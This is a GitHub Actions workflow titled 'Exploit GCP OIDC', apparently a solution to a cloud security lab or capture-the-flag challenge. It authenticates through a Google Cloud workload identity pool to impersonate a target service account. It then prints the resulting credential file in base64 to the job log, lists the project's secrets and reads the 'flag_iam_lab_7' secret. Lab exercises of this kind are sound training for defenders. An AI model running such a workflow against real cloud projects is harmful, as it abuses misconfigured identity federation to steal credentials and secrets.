name: Exploit GCP OIDC  
on:
  workflow_dispatch:

permissions:
  id-token: write

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - id: "auth"
        name: "Authenticate to GCP"
        uses: "google-github-actions/auth@v0.3.1"
        with:
          create_credentials_file: "true"
          workload_identity_provider: "projects/809548544159/locations/global/workloadIdentityPools/iam-lab-7-gh-pool/providers/iam-lab-7-gh-pool-oidc-provider"
          service_account: "iam-lab-7-target@gcp-labs-5fpuihyc.iam.gserviceaccount.com"

      - id: "dump-creds"
        name: "Dump Credentials"
        run: |
          echo "Base64-encoded credentials:"
          cat "${{ steps.auth.outputs.credentials_file_path }}" | base64

      - id: "extract-secret"
        name: "Extract Secret"
        run: |
          gcloud auth login --brief --cred-file="${{ steps.auth.outputs.credentials_file_path }}"
          gcloud secrets list --project gcp-labs-5fpuihyc
          gcloud secrets versions access 1 --secret flag_iam_lab_7 --project gcp-labs-5fpuihyc
